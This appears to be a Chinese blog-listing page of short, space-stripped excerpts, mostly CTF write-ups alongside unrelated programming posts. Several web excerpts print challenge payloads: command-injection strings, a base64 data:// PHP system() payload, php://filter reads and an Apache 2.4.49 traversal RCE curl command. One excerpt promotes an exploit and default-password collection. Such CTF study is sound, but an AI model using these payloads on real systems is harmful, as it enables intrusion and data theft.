ctf

[GUET-CTF2019]re

fromz3import*#CreateaZ3solversolver=Solver()#Createanarrayofintegervariablestorepresenttheelementsofa1a1=[Int(f'a1[{i}]')foriinrange(32)]print(a1)#DefinetheconstraintsbasedontheCcodeconstraints=[16290
we have a whole life·2023-11-02 17:10

crypto-rsarsa(江苏工匠杯 CTF)

又是一题pwn结合crypto,记录一下。听说是鹤城杯2021babyrsa类似题目。源码challenge.sage:for_inrange(3):p=random_prime(2^1024)q=random_prime(2^1024)n=p*qp1=p>>724ct=n*inverse_mod(q%(2**265),2^265)%2^265print('p1=',p1)print('ct=',
山猪儿烦不得·2023-11-02 14:40

CTF-RSA加密-1

RSA加密算法RSA算法的具体描述如下:(1)任意选取两个不同的大素数p和q计算乘积n=pqn=pqn=pq,φ(n)=(p−1)(q−1)φ(n)=(p-1)(q-1)φ(n)=(p−1)(q−1);(2)任意选取一个大整数e,满足gcd(e,φ(n))=1gcd(e,φ(n))=1gcd(e,φ(n))=1,也就是e和φ(n)互质,整数e用做加密钥;(3)确定的解密钥d,满足demodφ(n)
777sea·2023-11-02 14:07

CTF - 攻防世界 - mobile新手 - app3

下载android-backup-tookit:https://sourceforge.net/projects/adbextractor/files/latest/download执行下面的命令转换ab文件为jar文件:java-jarabe.jarunpackapp3.abapp3.jarjar包解压后base.apk,Demo.db,Encryto.db三个文件,盲猜应该与数据库,解密相关。
Sally__Zhang·2023-11-02 13:18

刷题学习记录

[RoarCTF2019]EasyJava1一开始是一个登陆页面,看着有点想用sql注入先试一遍,但是题目已经给出了这是关于Java的直接查看源码,发现参数要用POST的方式上传点击进入新页面百度查了一下这是
正在努力中的小白♤·2023-11-02 13:13

云尘-Acid

然后最后扫下来Challenge/Magic_Box/command.php发现了这个目录这不就ctf的ping的rce么直接执行命令看看这里如果我们需要反弹shell就需要通过bp的url编码;php-r
双层小牛堡·2023-11-02 12:30

ios-基础坑 [__NSPlaceholderDictionary initWithObjects:forKeys:count:]: attempt to insert nil object from object

这个坑便是如下[__NSPlaceholderDictionaryinitWithObjects:forKeys:count:]:attempttoinsertnilobjectfromobject平常的时候已经习惯了使用直接初始化
简鱼7819·2023-11-02 10:17

MySQL中的Base64函数

编码函数to_base64()selectto_base64("123")解码函数from_base64()selectfrom_base64("MTIz")
libraboy·2023-11-02 08:10

react context传值

staticcontextType=函数组件的useContextConsumer函数组件,类组件都可以staticcontextType类组件使用创建context//creatContext.jsimportReactfrom'react'exportconstNameContext
温柔先生·2023-11-02 07:16

TypeScript Tips (1) - allowSyntheticDefaultImports

因为需要这样导入React:import*asReactfrom'react'而JavaScript下是这样写的:importReactfrom'react'感觉上TypeScript的写法很不自然,但其实在
前端的爬行之旅·2023-11-02 07:43

BUG(15) : mapstruct Field converter required a bean of type that could not be found.

java-MAPSTRUCT-FieldmapperDTOinCustomerServiceImplrequiredabeanoftype'com.howtodoinjava.demo.mapper.MapperDTO'thatcouldnotbefound-STACKOOMmapstructFieldconverterrequiredabeanoftypethatcouldnotbefou
Lxinccode·2023-11-02 05:17

工具类(zip包解压)

importjava.util.zip.ZipEntry;importjava.util.zip.ZipFile;publicclassUnzipUtils{publicstaticvoidunzip(StringzipFile,StringextractFolder
可以养肥·2023-11-02 03:13

最新漏洞POC_exp集合站 IT设备默认用户名密码 证语网络安全Lab

证语问安-最新漏洞POC_exp集合站证语网络安全Labhttps://docs.qq.com/doc/DWHNoWHFKeVpFWUZG打完hw想玩ctf的可以看看polarctf.com建议各位使用
奇乃正·2023-11-02 02:25

2019-10-26

···importReactfrom'@react';//var{subscribers}=React.getApp().globalData;functionEvent(eventName,callback
你的蓝孩财子·2023-11-02 00:13

CTF-misc练习(https://buuoj.cn)之第二页

目录一、被劫持的神秘礼物二、刷新过的图片三、[BTF2020]认真你就输了四、[BJDCTF2020]藏藏藏五、被偷走的流量九、菜刀666十、秘密文件十一、[BJDCTF2020]just_a_rar十二
想要暴富的小林子·2023-11-01 23:55

BUUCTF MISC 61 - 80

61、heikediguo打开题目给的TXT文件发现很像文件的十六进制,导入010查看一下,发现是一个rar文件将文件另存为rar得到一个加密的压缩包,无任何提示,先尝试四位纯数字爆破得到一张无法打开的图片,放入010查看校验发现不是PNG文件,既然文件头有问题,尝试看一下文件尾FFD9明显是JPG文件尾(PNG文件尾:AE426082),于是修改文件头为FFD8FF62、你能看懂音符吗题目给出的
ジキル·2023-11-01 23:21

[青少年CTF]Crypto—Easy by 周末

闲的没事写份wp(~ ̄▽ ̄)~个人博客:https://www.st1ck4r.top0x01一起下棋考点:棋盘密码在线解密:https://www.qqxiuzi.cn/bianma/qipanmima.php0x02emoji考点:Emoji表情符号编码,XXencode,核心价值观编码Emoji表情符号编码XXencode核心价值观编码0x03SomeWord考点:BubbleBabble编
ZhouMo.·2023-11-01 23:51

BUUCTF Crypto1-20

https://blog.csdn.net/ao52426055/article/details/1093046461、MD5MD5在线网站解密2、一眼就解密base64解码3、URL编码控制台解码decodeURI()、decodeURIComponent()4、看我回旋踢凯撒密码5、摩丝摩斯密码6、PASSWORD有点社工?一般姓名缩写加生日随机组合,先试试flag{zs19900315}7、
ジキル·2023-11-01 23:51

CTF-MISC总结

这里写自定义目录标题1.看图片属性2.隐藏在字节中3.补充头部4.ZIPZIP文件格式真加密伪加密5.LSB隐写6.双图7.音频分析8.压缩包暴力破解9.掩码攻击10.明文攻击11.图片高宽修改计算图片正确宽高爆破图片高度JPG格式PNG格式12.文件分离foremostbinwalkdd命令13.隐藏文件加密F5隐写steghideoutguessJPHScloacked-pixel14.提取电
Atkxor·2023-11-01 23:51

实验吧-杂项-欢迎来到地狱

欢迎来到地狱原题连接http://ctf5.shiyanbar.com/stega/hell/欢迎来到地狱.zip分析图片打不开,缺少文件头(.jpgFFD8FF),粘贴3字节修改一下即可。
「已注销」·2023-11-01 23:49

moctf misc writeup

moctf{e4sy_1ma9e_m1sc}2.假装安全同上题,先将图片保存到本地,再用n
烟敛寒林o·2023-11-01 23:46

BUUCTF Misc wp大合集(2)

前言之前做杂项的题比较佛,主要是比赛里面考的大多是脑洞,弯路多,有时候没有hint挺难找到思路,做多了也没什么提升,还是喜欢实打实的脚本题和取证分析。4月25号到五一假期结束那段时间,一口气刷了五页题,实际上考点就那些。小学期搞完了之后,来总结一下知识体系,有些很简单的签到题就一语带过了,用到脚本的题,我会把代码贴上去题解第二页[被劫持的神秘礼物]追踪TCP流,可以看到这个地方是用POST方式进行
1vyyyyyy·2023-11-01 23:16

BUUCTF 神秘龙卷风 1

BUUCTF:https://buuoj.cn/challenges题目描述:神秘龙卷风转转转,科学家用四位数字为它命名,但是发现解密后居然是一串外星人代码!!好可怕!
玥轩_521·2023-11-01 22:34

BUUCTF 后门查杀 1

BUUCTF:https://buuoj.cn/challenges题目描述:小白的网站被小黑攻击了,并且上传了Webshell,你能帮小白找到这个后门么?
玥轩_521·2023-11-01 22:34

BUUCTF 小明的保险箱 1

BUUCTF:https://buuoj.cn/challenges题目描述:小明有一个保险箱,里面珍藏了小明的日记本,他记录了什么秘密呢?。。。告诉你,其实保险箱的密码四位纯数字密码。
玥轩_521·2023-11-01 22:04

BUUCTF webshell后门 1

BUUCTF:https://buuoj.cn/challenges题目描述:朋友的网站被黑客上传了webshell后门,他把网站打包备份了,你能帮忙找到黑客的webshell在哪吗?
玥轩_521·2023-11-01 21:01

攻防系列——板块化刷题记录(敏感信息泄露)

目录一、目录遍历例题二:结合上传漏洞一起使用二、robots文件泄露例题:攻防世界web题:Training-WWW-Robots编辑三、泄露PHPinfo文件例题一:ctfhub的phpinfo四、备份文件下载例题一
番茄条子·2023-11-01 21:34

afn请求修改服务器数据,ios - 服务器那边的请求的content-tpye是multipart/form-data,我要怎么发送数据去请求?用afnetworking...

NSDictionary*sinaDBDictionary=[sinaDBArrayobjectAtIndex:0];NSString*accessTokenKey=[sinaDBDictionaryobjectForKey
滴水吞舟·2023-11-01 19:53

纯生信分析套路 5+TF-lncRNA肿瘤调控网络构建

DynamicTF-lncRNARegulatoryNetworksRevealedPrognosticSignaturesintheDevelopmentofOvarianCancer动态TF-
概普生信·2023-11-01 18:23

跑腿小程序开发解析:技术架构、接口设计和前沿趋势

//ReactNative示例importReactfrom'react';import{Text,Vie
万岳科技系统开发·2023-11-01 18:21

Mysql预编译动态拼接表名查询

现在对deal_runnning表进行按年月分表,需要动态拼接表名查询2.需要执行此sql.表名要动态拼接,目标sql如下,使用concat连接表名无效.SELECTid,bazaar_id,(SELECTfmNameFROMfm_boooth_shop_userWHEREfmId
zhangshengqiang168·2023-11-01 18:42

femu使用记录

femu使用记录环境搭建libnvme:libnvme.so.1:cannotopensharedobjectfile:Nosuchfileordirectory调试方法ZoneAppendSizeLimit
最佳损友1020·2023-11-01 17:02

React笔记 && Taro笔记

React基础1组件通讯1.1props子组件importReactfrom"react";importPropTypesfrom"prop-types";import{Button}from"antd
journey_IT·2023-11-01 17:17

青少年CTFmisc-间谍的录音

青少年CTFmisc-间谍的录音青少年CTFmisc-间谍的录音青少年CTFmisc-间谍的录音一个压缩包一段录音直接用MMsstv或者qsstv都可以解得到图片百度识图找名字图片里没有找到信息以为名字是
一本正经光头强·2023-11-01 17:19

ctfshow-web入门命令执行29-36

29源代码给了禁用flag使用tac、nl?c=echo`nlf*`;?c=echo`tacf*`;30多禁用了system和php和上题区别不大,使用上一题命令就能解?c=echo`nlf*`;?c=echo`tacf*`;31禁用了空格使用%09代替?c=echo%09`tac%09f*`;32禁用了echo使用php伪协议?c=include$_GET["1"]?>&1=php://filt
一本正经光头强·2023-11-01 17:49

青少年CTFmisc-simpleness

里面解出两个文件:hint.pnghint.rar这个hint.rar是伪加密,随便打开一个十六进制的编辑器:,这里的24表示已加密,改成20表示未加密,打开hint.txt提示1:key.zip的密码范围是qsnctf
一本正经光头强·2023-11-01 17:48

ctfshow-web入门37-52

include($c);表达式包含并运行指定文件。使用data伪协议?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==是base64加密源代码查看得到flag38多禁用了php和file。不会改变伪协议,继续使用上一题
一本正经光头强·2023-11-01 16:40

Java ant ivy tutorial

*/.jarcmmandlinesant-pantresolveantcompilejarrunantjunit#runjunittestbuild.xml/>-->ivy.xml说明:1.projectfolder
GREARLILITH·2023-11-01 16:58

RSA从原理到ctf解题(解题篇Ⅰ)

bugkursa一道关于rsa常规的ctf题目(来自bugku):链接:https://ctf.bugku.com/files/98e8f374f63ee3ef4818621ceafcb78f/rsa.txtrsa2
漫谈·2023-11-01 15:44

网鼎杯pwn WP

前言本周参加了两个比赛,一个是de1CTF,另一个是网鼎杯,把这两场比赛全部总结一下。
白里个白·2023-11-01 15:45

CTF渗透测试——ssh私钥泄露

1.探测ip地址netdiscovernetdiscover-rip/mask//探测指定网段如:netdiscover-r192.168.31.1/242.测试连通性ping172.19.27.167能够ping通,接下来使用nmap扫描一下开放的端口3.使用nmap扫描主机开放端口,版本信息nmap-sV172.19.27.167//nmap各参数详解:[这里](https://blog.cs
君子使物,不为物使·2023-11-01 13:32

stm32 ETH

1HowdoIcreateaprojectforSTM32H7withEthernetandLwIPstackworking?
17506331945·2023-11-01 10:17

CEST (Confidential Evaluation of Software Trustworthiness) project finished

atsecwouldliketoproudlyannounceasuccessfulcompletionoftheCEST(ConfidentialEvaluationofSoftwareTrustworthiness)project-aSwedishresearchprojectfundedbyVinnova.TheCES
atsec·2023-11-01 10:57

oracle怎么修改主键索引,oracle的常用sql 表的新增,修改,唯一,索引,主键,备注...

numsNUMBER(14),sjztVARCHAR2(6)default'0'notnull,timeDATEdefaultsysdatenotnull)2.分配表空间tablespaceDATApctfree10initrans1maxtrans255storage
邬盛·2023-11-01 09:52

多路转接(多路复用)

文章目录引言三种多路转接selectfd_set使用方式demoepoll接口事件结构structepoll_eventdemoepoll工作模式水平触发LT边缘触发ET`1.边沿触发只通知一次的问题:
敬亭山_·2023-11-01 08:17

[ROS系列]ubuntu 20.04 从零配置orbslam3(无坑版)

/HelloPangolin:errorwhileloadingsharedlibraries:libpango_windowing.so:cannotopensharedobjectfile:Nosuchfileordirectory
孙兔子·2023-11-01 06:26

Android studio 配置多渠道打包配置

app目录下build.gradle中android节点下添加//配置不通版本ip融云key融云本地服务IpproductFlavors{bbbb{//测试运行环境//配置参数可在BuildConfig
satisfying·2023-11-01 05:49

文件上传与Phar反序列化的摩擦

二、Phar压缩文件的组成三、Phar伪协议四、SWPU2018[SimplePHP]五、[NSSRound#4SWPU]1zweb六、[HSCSEC2023]EASYPHY七、[SWPUCTF2021
Aiwin-Hacker·2023-11-01 04:19

NSSCTF Round#8 Basic

from:http://v2ish1yan.topMyDoor使用php伪协议读取index.php的代码php://filter/read=convert.base64-encode/resource=index.phpbase64_payload="PD89YCRfR0VUWzBdYDs7Pz4"conversions={'R':'convert.iconv.UTF8.UTF16LE|conv
v2ish1yan·2023-11-01 04:49

NSSCTF Round#4

1zweb打开界面感觉这道题和上一个一样,有查询文件的功能,直接查询flag,签到提ez_rce打开界面各种看,源码啥都没有然后抓包看一下配置,搜一下有,2.4.49有目录遍及的漏洞,和以前做的一道题几乎一样远程代码执行curl-v--data"echo;id"'http://192.168.190.134:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32
偶尔躲躲乌云334·2023-11-01 04:17
上一页 75 76 77 78 79 80 81 82 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他